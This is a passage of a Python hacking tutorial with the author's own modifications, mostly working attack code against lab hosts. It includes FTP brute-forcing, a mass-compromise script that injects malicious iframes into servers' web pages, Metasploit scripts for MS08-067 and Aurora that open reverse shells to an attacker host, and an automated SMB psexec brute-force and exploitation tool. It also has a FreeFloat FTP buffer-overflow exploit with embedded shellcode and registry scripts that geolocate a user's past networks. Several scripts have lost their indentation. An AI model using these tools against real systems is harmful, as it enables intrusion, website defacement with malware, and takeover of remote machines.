            print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + "/" + password
            return (username, password)
        except Exception, e:
            pass
    print '\n[-] Could not brute force FTP credentials.'
    return (None, None)

def main():
    while True:
        h = raw_input("[*] Please enter the hostname: ")
        f = raw_input("[*] Please enter the filename: ")
        bruteLogin(h, f)
        print

if __name__ == '__main__':
    main()
Output:
With FTP credentials in hand, we can test whether the server also provides a web service: each filename returned by nlst() is checked against default web-page filenames, and every default page found is appended to the retList list:
#!/usr/bin/python
#coding=utf-8
import ftplib

def returnDefault(ftp):
    try:
        # nlst() lists the files in the directory
        dirList = ftp.nlst()
    except:
        dirList = []
        print '[-] Could not list directory contents.'
        print '[-] Skipping To Next Target.'
        return
    retList = []
    for filename in dirList:
        # lower() converts the file name to lowercase
        fn = filename.lower()
        if '.php' in fn or '.asp' in fn or '.htm' in fn:
            print '[+] Found default page: ' + filename
            retList.append(filename)
    return retList

host = '10.10.10.130'
username = 'ftpuser'
password = 'ftppassword'
ftp = ftplib.FTP(host)
ftp.login(username, password)
returnDefault(ftp)
Output:
[My modified code]
#!/usr/bin/python
#coding=utf-8
import ftplib

def returnDefault(ftp):
    try:
        # nlst() lists the files in the directory
        dirList = ftp.nlst()
    except:
        dirList = []
        print '[-] Could not list directory contents.'
        print '[-] Skipping To Next Target.'
        return
    retList = []
    for fileName in dirList:
        # lower() converts the file name to lowercase
        fn = fileName.lower()
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print '[+] Found default page: ' + fileName
            retList.append(fileName)
    if len(retList) == 0:
        print '[-] No default page found.'
        print '[-] Skipping To Next Target.'
    return retList

def main():
    while True:
        host = raw_input('[*]Host >>> ')
        username = raw_input('[*]Username >>> ')
        password = raw_input('[*]Password >>> ')
        try:
            ftp = ftplib.FTP(host)
            ftp.login(username, password)
            returnDefault(ftp)
        except:
            print '[-] Logon failed.'
        print

if __name__ == '__main__':
    main()
Output:
This section reuses the earlier Aurora exploit. First open the Metasploit console in Kali, then enter:
search ms10_002_aurora
use exploit/windows/browser/ms10_002_aurora
show payloads
set payload windows/shell/reverse_tcp
show options
set SRVHOST 10.10.10.160
set URIPATH /exploit
set LHOST 10.10.10.160
set LPORT 443
exploit
After running it, browsing to http://10.10.10.160:8080/exploit from Win 2k3 Server and XP produced connection information but no shell, probably because those IE versions are not vulnerable to Aurora:
With the flow now clear, the goal is to inject code into the target server's web pages that visits http://10.10.10.160:8080/exploit. The full code:
#!/usr/bin/python
#coding=utf-8
import ftplib

def injectPage(ftp, page, redirect):
    f = open(page + '.tmp', 'w')
    # download the file over FTP
    ftp.retrlines('RETR ' + page, f.write)
    print '[+] Downloaded Page: ' + page
    f.write(redirect)
    f.close()
    print '[+] Injected Malicious IFrame on: ' + page
    # upload the injected file
    ftp.storlines('STOR ' + page, open(page + '.tmp'))
    print '[+] Uploaded Injected Page: ' + page

host = '10.10.10.130'
username = 'ftpuser'
password = 'ftppassword'
ftp = ftplib.FTP(host)
ftp.login(username, password)
redirect = ''
injectPage(ftp, 'index.html', redirect)
Output:
Download, injection, and upload all succeed; checking the corresponding file on the server confirms the injection worked:
Exploitation then proceeds as at the start of this section: just open msf and set up the listener.
[My modified code]
#!/usr/bin/python
#coding=utf-8
import ftplib

def injectPage(ftp, page, redirect):
    f = open(page + '.tmp', 'w')
    # download the file over FTP
    ftp.retrlines('RETR ' + page, f.write)
    print '[+] Downloaded Page: ' + page
    f.write(redirect)
    f.close()
    print '[+] Injected Malicious IFrame on: ' + page
    # upload the injected file
    ftp.storlines('STOR ' + page, open(page + '.tmp'))
    print '[+] Uploaded Injected Page: ' + page
    print

def main():
    while True:
        host = raw_input('[*]Host >>> ')
        username = raw_input('[*]Username >>> ')
        password = raw_input('[*]Password >>> ')
        redirect = raw_input('[*]Redirect >>> ')
        print
        try:
            ftp = ftplib.FTP(host)
            ftp.login(username, password)
            injectPage(ftp, 'index.html', redirect)
        except:
            print '[-] Logon failed.'

if __name__ == '__main__':
    main()
Output:
This integrates the code from the previous sections, mainly by adding an attack() function: it logs into the FTP server with the given username and password, then calls the other functions to search for default pages, download them, inject the payload, and re-upload. In essence it just orchestrates the functions from the earlier sections.
#!/usr/bin/python
#coding=utf-8
import ftplib
import optparse
import time

def attack(username, password, tgtHost, redirect):
    ftp = ftplib.FTP(tgtHost)
    ftp.login(username, password)
    defPages = returnDefault(ftp)
    for defPage in defPages:
        injectPage(ftp, defPage, redirect)

def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', '[email protected]')
        print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'
        ftp.quit()
        return True
    except Exception, e:
        print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'
        return False

def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        username = line.split(':')[0]
        password = line.split(':')[1].strip('\r').strip('\n')
        print '[+] Trying: ' + username + '/' + password
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(username, password)
            print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password
            ftp.quit()
            return (username, password)
        except Exception, e:
            pass
    print '\n[-] Could not brute force FTP credentials.'
    return (None, None)

def returnDefault(ftp):
    try:
        # nlst() lists the files in the directory
        dirList = ftp.nlst()
    except:
        dirList = []
        print '[-] Could not list directory contents.'
        print '[-] Skipping To Next Target.'
        return
    retList = []
    for filename in dirList:
        # lower() converts the file name to lowercase
        fn = filename.lower()
        if '.php' in fn or '.asp' in fn or '.htm' in fn:
            print '[+] Found default page: ' + filename
            retList.append(filename)
    return retList

def injectPage(ftp, page, redirect):
    f = open(page + '.tmp', 'w')
    # download the file over FTP
    ftp.retrlines('RETR ' + page, f.write)
    print '[+] Downloaded Page: ' + page
    f.write(redirect)
    f.close()
    print '[+] Injected Malicious IFrame on: ' + page
    # upload the injected file
    ftp.storlines('STOR ' + page, open(page + '.tmp'))
    print '[+] Uploaded Injected Page: ' + page

def main():
    parser = optparse.OptionParser('[*] Usage: ./massCompromise.py -H <target host[s]> -r <redirect page> -f <userpass file>')
    parser.add_option('-H', dest='hosts', type='string', help='specify target host')
    parser.add_option('-r', dest='redirect', type='string', help='specify redirect page')
    parser.add_option('-f', dest='file', type='string', help='specify userpass file')
    (options, args) = parser.parse_args()
    # split into a list of hosts; without split() it would stay a single string
    hosts = str(options.hosts).split(',')
    redirect = options.redirect
    file = options.file
    # the userpass file need not be checked here, since anonymous login is tried first
    if hosts == None or redirect == None:
        print parser.usage
        exit(0)
    for host in hosts:
        username = None
        password = None
        if anonLogin(host) == True:
            username = 'anonymous'
            password = '[email protected]'
            print '[+] Using Anonymous Creds to attack'
            attack(username, password, host, redirect)
        elif file != None:
            (username, password) = bruteLogin(host, file)
            if password != None:
                print '[+] Using Cred: ' + username + '/' + password + ' to attack'
                attack(username, password, host, redirect)

if __name__ == '__main__':
    main()
Output:
Since anonymous login works, the injection attack can proceed directly.
[My modified code]
However, the files visible to the anonymous login belong only to the anonymous user, not to ftpuser, the regular FTP user; so to inject into both at once, the code is tweaked slightly:
#!/usr/bin/python
#coding=utf-8
import ftplib
import optparse
import time
def attack(username,password,tgtHost,redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username,password)
defPages = returnDefault(ftp)
for defPage in defPages:
injectPage(ftp,defPage,redirect)
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous','[email protected]')
print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'
ftp.quit()
return True
except Exception, e:
print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'
return False
def bruteLogin(hostname,passwdFile):
pF = open(passwdFile,'r')
for line in pF.readlines():
username = line.split(':')[0]
password = line.split(':')[1].strip('\r').strip('\n')
print '[+] Trying: ' + username + '/' + password
try:
ftp = ftplib.FTP(hostname)
ftp.login(username,password)
print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password
ftp.quit()
return (username,password)
except Exception, e:
pass
print '\n[-] Could not brubrute force FTP credentials.'
return (None,None)
def returnDefault(ftp):
try:
#nlst()方法获取目录下的文件
dirList = ftp.nlst()
except:
dirList = []
print '[-] Could not list directory contents.'
print '[-] Skipping To Next Target.'
return
retList = []
for filename in dirList:
#lower()方法将文件名都转换为小写的形式
fn = filename.lower()
if '.php' in fn or '.asp' in fn or '.htm' in fn:
print '[+] Found default page: '+filename
retList.append(filename)
return retList
def injectPage(ftp,page,redirect):
f = open(page + '.tmp','w')
#下载FTP文件
ftp.retrlines('RETR ' + page,f.write)
print '[+] Downloaded Page: ' + page
f.write(redirect)
f.close()
print '[+] Injected Malicious IFrame on: ' + page
#上传目标文件
ftp.storlines('STOR ' + page,open(page + '.tmp'))
print '[+] Uploaded Injected Page: ' + page
def main():
parser = optparse.OptionParser('[*] Usage : ./massCompromise.py -H -r -f ]')
parser.add_option('-H',dest='hosts',type='string',help='specify target host')
parser.add_option('-r',dest='redirect',type='string',help='specify redirect page')
parser.add_option('-f',dest='file',type='string',help='specify userpass file')
(options,args) = parser.parse_args()
#split(',') yields a list of hosts; without it, hosts would be a single string
hosts = str(options.hosts).split(',')
redirect = options.redirect
file = options.file
#the userpass file is not required here, since anonymous login is attempted first
if options.hosts == None or redirect == None:
print parser.usage
exit(0)
for host in hosts:
username = None
password = None
if anonLogin(host) == True:
username = 'anonymous'
password = '[email protected]'
print '[+] Using Anonymous Creds to attack'
attack(username,password,host,redirect)
if file != None:
(username,password) = bruteLogin(host,file)
if password != None:
print '[+] Using Cred: ' + username + '/' + password + ' to attack'
attack(username,password,host,redirect)
if __name__ == '__main__':
main()
Run result:
You can see that the files found under the two users are different.
Eleven passwords worth having in any password-attack wordlist:
aaa
academia
anything
coffee
computer
cookie
oracle
password
secret
super
unknown
This demonstration exploits the MS08-067 vulnerability.
Save the following commands as conficker.rc:
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.10.10.123
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.10.160
set LPORT 7777
exploit -j -z
Here the -j flag to the exploit command runs the attack as a background job, and -z means do not interact with the session once the attack completes.
Then run: msfconsole -r conficker.rc
After a session (session 1) is obtained, open it:
Executing msf operations by reading commands from a file this way yields a shell on the XP target.
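The same resource script can be generated from Python rather than written by hand; this is the idea the later scripts build on. A sketch using the RHOST/LHOST values from the text:

```python
# Generate the conficker.rc resource script from Python.
# The addresses and port are the ones used in the text above.
commands = [
    'use exploit/windows/smb/ms08_067_netapi',
    'set RHOST 10.10.10.123',
    'set PAYLOAD windows/meterpreter/reverse_tcp',
    'set LHOST 10.10.10.160',
    'set LPORT 7777',
    'exploit -j -z',
]
with open('conficker.rc', 'w') as rc:
    rc.write('\n'.join(commands) + '\n')
```

Running `msfconsole -r conficker.rc` afterwards replays the commands exactly as if typed.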
Import the nmap library. findTgts() scans port 445 on every host in the subnet, setupHandler() acts as the listener that compromised targets connect back to, and confickerExploit() emits the same content as the conficker.rc script from the previous section:
#!/usr/bin/python
#coding=utf-8
import nmap
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet,'445')
tgtHosts = []
for host in nmScan.all_hosts():
#if the target host exposes TCP port 445
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
#and port 445 is open
if state == 'open':
print '[+] Found Target Host: ' + host
tgtHosts.append(host)
return tgtHosts
def setupHandler(configFile,lhost,lport):
configFile.write('use exploit/multi/handler\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
#set the global variable DisablePayloadHandler so that once a listener has been created, subsequent hosts do not spawn duplicate listeners
#setg sets an option globally
configFile.write('setg DisablePayloadHandler 1\n')
def confickerExploit(configFile,tgtHost,lhost,lport):
configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
#-j runs the exploit as a background job; -z avoids interacting with the session afterwards
configFile.write('exploit -j -z\n')
The point to note is that in confickerExploit() the script issues a command that exploits the target in the context of a background job (-j) without interacting with that job immediately (-z). Because the script works in batch mode against many targets, it cannot interact with every host simultaneously, so -j and -z are required.
Next, SMB usernames/passwords are brute-forced to gain the right to remotely execute a process (psexec) on the target. The username is fixed to Administrator, the password file is opened, and for each password a Metasploit stanza for remote process execution is generated; a correct password returns a command shell:
def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):
username = 'Administrator'
pF = open(passwdFile,'r')
for password in pF.readlines():
password = password.strip('\n').strip('\r')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser ' + str(username) + '\n')
configFile.write('set SMBPass ' + str(password) + '\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
#!/usr/bin/python
#coding=utf-8
import nmap
import os
import optparse
import sys
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet,'445')
tgtHosts = []
for host in nmScan.all_hosts():
#if the target host exposes TCP port 445
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
#and port 445 is open
if state == 'open':
print '[+] Found Target Host: ' + host
tgtHosts.append(host)
return tgtHosts
def setupHandler(configFile,lhost,lport):
configFile.write('use exploit/multi/handler\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
#set the global variable DisablePayloadHandler so that once a listener has been created, subsequent hosts do not spawn duplicate listeners
#setg sets an option globally
configFile.write('setg DisablePayloadHandler 1\n')
def confickerExploit(configFile,tgtHost,lhost,lport):
configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
#-j runs the exploit as a background job; -z avoids interacting with the session afterwards
configFile.write('exploit -j -z\n')
def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):
username = 'Administrator'
pF = open(passwdFile,'r')
for password in pF.readlines():
password = password.strip('\n').strip('\r')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser ' + str(username) + '\n')
configFile.write('set SMBPass ' + str(password) + '\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
def main():
configFile = open('meta.rc','w')
parser = optparse.OptionParser('[*] Usage : ./conficker.py -H <target hosts> -l <listen host> [-p <listen port> -F <password file>]')
parser.add_option('-H',dest='tgtHost',type='string',help='specify the target host[s]')
parser.add_option('-l',dest='lhost',type='string',help='specify the listen host')
parser.add_option('-p',dest='lport',type='string',help='specify the listen port')
parser.add_option('-F',dest='passwdFile',type='string',help='specify the password file')
(options,args)=parser.parse_args()
if options.tgtHost == None or options.lhost == None:
print parser.usage
exit(0)
lhost = options.lhost
lport = options.lport
if lport == None:
lport = '1337'
passwdFile = options.passwdFile
tgtHosts = findTgts(options.tgtHost)
setupHandler(configFile,lhost,lport)
for tgtHost in tgtHosts:
confickerExploit(configFile,tgtHost,lhost,lport)
if passwdFile != None:
smbBrute(configFile,tgtHost,passwdFile,lhost,lport)
configFile.close()
os.system('msfconsole -r meta.rc')
if __name__ == '__main__':
main()
Run result:
First, the shellcode variable is filled with the payload generated by the msf framework as hex; then overflow is set to 246 letter A's (hex \x41); next, ret points at an address in kernel32.dll holding an instruction that transfers control straight to the top of the stack; padding is 150 NOP instructions forming a NOP sled; finally all the variables are concatenated into the crash variable:
#!/usr/bin/python
#coding=utf-8
shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"
"\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"
"\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"
"\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"
"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"
"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"
"\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"
"\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"
"\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"
"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"
"\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"
"\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"
"\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"
"\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"
"\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"
"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"
"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"
"\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"
"\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"
"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"
"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"
"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"
"\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"
"\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"
"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"
"\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"
"\xba\x1e\x53\x31")
overflow = "\x41" * 246
ret = struct.pack('<L', 0x7C874413)
padding = "\x90" * 150
crash = overflow + ret + padding + shellcode
Here padding is a run of NOP (no-operation) instructions placed before the shellcode; it relaxes how precisely the attacker must guess the jump target, since landing anywhere in the NOP sled slides execution straight into the shellcode.
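The ret variable packs the kernel32.dll JMP ESP address (0x7C874413, per the comment in the full script below) as a little-endian 32-bit value, which is the byte order x86 expects on the stack. A quick check of what struct.pack produces:

```python
import struct

# Pack the JMP ESP address as a little-endian unsigned 32-bit value,
# exactly as the exploit's ret variable does.
ret = struct.pack('<L', 0x7C874413)
print(repr(ret))  # least significant byte first
```

Note the bytes come out reversed relative to how the address is written, which is why the raw address cannot simply be embedded as text.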
A socket opens a connection to TCP port 21 on the target; on success the script logs in anonymously and then sends the FTP command RETR followed by the crash variable. Because the affected program fails to validate user input, this triggers a stack-based buffer overflow that overwrites the EIP register and makes the program jump into the shellcode and execute it:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target, 21))
except:
print "[-] Connection to " + target + " failed!"
sys.exit(0)
print "[*] Sending " + str(len(crash)) + " " + command + " byte crash..."
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS \r\n")
s.recv(1024)
s.send("RETR" + " " + crash + "\r\n")
time.sleep(4)
Download a build of FreeFloat FTP that runs on XP, and the exploit can then be tested:
#!/usr/bin/python
#coding=utf-8
import socket
import sys
import time
import struct
if len(sys.argv) < 3:
print "[-] Usage: %s <target addr> <command>" % sys.argv[0] + "\r"
print "[-] For example [filename.py 192.168.1.10 PWND] would do the trick."
print "[-] Other options: AUTH, APPE, ALLO, ACCT"
sys.exit(0)
target = sys.argv[1]
command = sys.argv[2]
if len(sys.argv) > 2:
platform = sys.argv[2]
#./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b "\x00\xff\x0d\x0a\x3d\x20"
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"
"\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"
"\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"
"\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"
"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"
"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"
"\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"
"\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"
"\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"
"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"
"\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"
"\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"
"\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"
"\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"
"\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"
"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"
"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"
"\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"
"\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"
"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"
"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"
"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"
"\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"
"\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"
"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"
"\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"
"\xba\x1e\x53\x31")
#7C874413 FFE4 JMP ESP kernel32.dll
overflow = "\x41" * 246
ret = struct.pack('<L', 0x7C874413)
padding = "\x90" * 150
crash = overflow + ret + padding + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target, 21))
except:
print "[-] Connection to " + target + " failed!"
sys.exit(0)
print "[*] Sending " + str(len(crash)) + " " + command + " byte crash..."
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS \r\n")
s.recv(1024)
s.send(command + " " + crash + "\r\n")
time.sleep(4)
Open cmd as administrator and enter the following command to list, for each network, the profile GUID together with the network's description, name, and gateway MAC address:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\NetworkList\Signatures\Unmanaged" /s
This uses Python's _winreg library, which is installed by default with Python on Windows.
After connecting to the registry, OpenKey() opens the relevant key, and a loop walks through every network profile stored beneath it, printing the FirstNetwork network name and the MAC address from the DefaultGateway value.
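The REG_BINARY-to-MAC conversion done by the val2addr function in the script can be exercised without touching the registry. A sketch that accepts a raw 6-byte value (the sample bytes are made up):

```python
def val2addr(val):
    """Format a raw 6-byte REG_BINARY value as a colon-separated MAC string."""
    # bytearray() gives integer byte values for both Python 2 str and Python 3 bytes
    return ':'.join('%02x' % b for b in bytearray(val))[:17]

print(val2addr(b'\x00\x1a\x2b\x3c\x4d\x5e'))
```

The [:17] slice keeps exactly six colon-separated octets, mirroring the original's truncation.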
#!/usr/bin/python
#coding=utf-8
from _winreg import *
# convert a REG_BINARY value into a readable MAC address
def val2addr(val):
addr = ""
for ch in val:
addr += ("%02x " % ord(ch))
addr = addr.strip(" ").replace(" ", ":")[0:17]
return addr
# print the network profile information
def printNets():
net = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"
key = OpenKey(HKEY_LOCAL_MACHINE, net)
print "\n[*]Networks You have Joined."
for i in range(100):
try:
guid = EnumKey(key, i)
netKey = OpenKey(key, str(guid))
(n, addr, t) = EnumValue(netKey, 5)
(n, name, t) = EnumValue(netKey, 4)
macAddr = val2addr(addr)
netName = name
print '[+] ' + netName + ' ' + macAddr
CloseKey(netKey)
except:
break
def main():
printNets()
if __name__ == '__main__':
main()
Run result:
Note that the script only works when run from a cmd opened with administrator privileges.
This version adds a visit to the Wigle site, passing it each MAC address to retrieve latitude/longitude and other physical-location information.
#!/usr/bin/python
#coding=utf-8
from _winreg import *
import mechanize
import urllib
import re
import urlparse
import os
import optparse
# convert a REG_BINARY value into a readable MAC address
def val2addr(val):
addr = ""
for ch in val:
addr += ("%02x " % ord(ch))
addr = addr.strip(" ").replace(" ", ":")[0:17]
return addr
# print the network profile information
def printNets(username, password):
net = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"
key = OpenKey(HKEY_LOCAL_MACHINE, net)
print "\n[*]Networks You have Joined."
for i in range(100):
try:
guid = EnumKey(key, i)
netKey = OpenKey(key, str(guid))
(n, addr, t) = EnumValue(netKey, 5)
(n, name, t) = EnumValue(netKey, 4)
macAddr = val2addr(addr)
netName = name
print '[+] ' + netName + ' ' + macAddr
wiglePrint(username, password, macAddr)
CloseKey(netKey)
except:
break
# look up the latitude/longitude for a MAC address via Wigle
def wiglePrint(username, password, netid):
browser = mechanize.Browser()
browser.open('http://wigle.net')
reqData = urllib.urlencode({'credential_0': username, 'credential_1': password})
browser.open('https://wigle.net/gps/gps/main/login', reqData)
params = {}
params['netid'] = netid
reqParams = urllib.urlencode(params)
respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
resp = browser.open(respURL, reqParams).read()
mapLat = 'N/A'
mapLon = 'N/A'
rLat = re.findall(r'maplat=.*\&', resp)
if rLat:
mapLat = rLat[0].split('&')[0].split('=')[1]
rLon = re.findall(r'maplon=.*\&', resp)
if rLon:
mapLon = rLon[0].split('&')[0].split('=')[1]
print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
def main():
parser = optparse.OptionParser('usage %prog -u <wigle username> -p <wigle password>')
parser.add_option('-u', dest='username', type='string', help='specify wigle username')
parser.add_option('-p', dest='password', type='string', help='specify wigle password')
(options, args) = parser.parse_args()
username = options.username
password = options.password
if username == None or password == None:
print parser.usage
exit(0)
else:
printNets(username, password)
if __name__ == '__main__':
main()
Run result:
Only a single entry is displayed, with no physical-location information, so something is wrong.
Debugging to find the cause:
It turns out the site's robots.txt forbids requests to that page, so it cannot be fetched.
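The maplat/maplon scraping in wiglePrint can at least be verified offline against a sample response fragment (the HTML below is an assumption, not actual Wigle output):

```python
import re

# Sample response fragment -- an assumption, not a real Wigle page
resp = '... maplat=40.689060&maplon=-74.044636&zoom=17 ...'

mapLat = 'N/A'
mapLon = 'N/A'
rLat = re.findall(r'maplat=.*?\&', resp)
if rLat:
    mapLat = rLat[0].split('&')[0].split('=')[1]
rLon = re.findall(r'maplon=.*?\&', resp)
if rLon:
    mapLon = rLon[0].split('&')[0].split('=')[1]
print(mapLat, mapLon)
```

As for the robots.txt block itself: mechanize exposes browser.set_handle_robots(False) to skip robots.txt checking, though whether doing so is appropriate for a given site is another question.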
The Windows Recycle Bin is a special folder dedicated to holding deleted files.
The string naming each subdirectory is a user SID, which corresponds to a unique user account on the machine.
A function that locates deleted files/folders:
#!/usr/bin/python
#coding=utf-8
import os
# probe the candidate Recycle Bin directories and return the first one that exists
def returnDir():
dirs=['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\$Recycle.Bin\\']
for recycleDir in dirs:
if os.path.isdir(recycleDir):
return recycleDir
return None
The Windows registry can translate a SID into an exact username.
Run cmd as administrator and enter:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2595130515-3345905091-1839164762-1000" /s
The code:
#!/usr/bin/python
#coding=utf-8
import os
import optparse
from _winreg import *
# probe the candidate Recycle Bin directories and return the first one that exists
